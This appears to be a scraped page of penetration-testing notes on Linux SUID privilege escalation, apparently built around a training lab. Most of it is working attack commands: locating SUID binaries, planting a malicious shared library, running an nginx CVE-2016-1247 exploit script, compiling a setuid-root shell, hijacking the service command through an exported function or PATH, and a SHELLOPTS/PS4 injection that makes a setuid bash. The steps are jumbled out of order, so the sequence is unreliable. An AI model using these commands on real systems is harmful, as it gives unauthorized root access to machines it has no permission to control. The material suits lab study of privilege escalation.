SUID
Last updated
Last updated
find / -perm -u=s -type f 2>/dev/null will list all the files with the suid perm
You can see the suid perm in the permissions as an s like here:
Here again we can use GTFOBins and check if our command is in there and has documented exploitation
You see and example of this exploit in this writeup
find / -type f -perm -04000 -ls 2>/dev/null
ls -al nameoffile
In our example the file is /usr/local/bin/suid-so
strace /usr/local/bin/suid-so 2>&1 with a grep on what could be interesting strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file" this will show us what happens with the file. This is the place to check if we have rights on one of the file it uses. In our example we will use the file in this output open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)
Once we find a file we can try to overwrite it with a payload to elevate our privileges
We make a directory for our file
We compile our file gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/libcalc.c in my example the file I will overright is /home/user/.config/libcalc.so
This way we just need to run the sid file which is /usr/local/bin/suid-so in our example
Issues on log created by nginx
./linuxexploitsuggester.sh we should have this output [+] [CVE-2016-1247] nginxed-root.sh or we could manually look for this specific vulnerability by checking nginx version dpkg -l | grep nginx
Now we need to check if the suid bit is set on sudo find / -type f -perm -04000 -ls 2>/dev/null or ls -al /usr/bin/sudo
ls -al /var/log/nginx
We will need to create a malicious symlink
We will use this to do so
./nginxed-root.sh /var/log/nginx/error.log
Check out this resource to learn more about this way to escalate
Let's create a malicious service and add it to our path so that it is launched instead of apache
echo 'int main() {setgid(0); setuid(0); system("/bin/bash"); return 0;}' > /tmp/service.c
gcc /tmp/service.c -o /tmp/service
function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; } instead of creating a malicious bin we create a malicious function
export -f /usr/sbin/service then we export our function in the path
/usr/local/bin/suid-env2 finally we just need to launch the service
OR
env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)' /bin/sh -c '/usr/local/bin/suid-env2; set +x; /tmp/bash -p'
And it should give us a root prompt
When nginx will be restarted, we will be root
find / -type f -perm -04000 -ls 2>/dev/null we can then chek for env var with the suid bit activated in our example we have /usr/local/bin/suid-env this launches apache using service (we know this by making a strings on the file).
We now need to change our path export PATH=/tmp:$PATH
And now we just need to run the binary /usr/local/bin/suid-env to escalate to root
find / -type f -perm -04000 -ls 2>/dev/null we can then chek for env var with the suid bit activated in our example we have /usr/local/bin/suid-env2 this launches apache using its full path service (we know this by making a strings on the file).
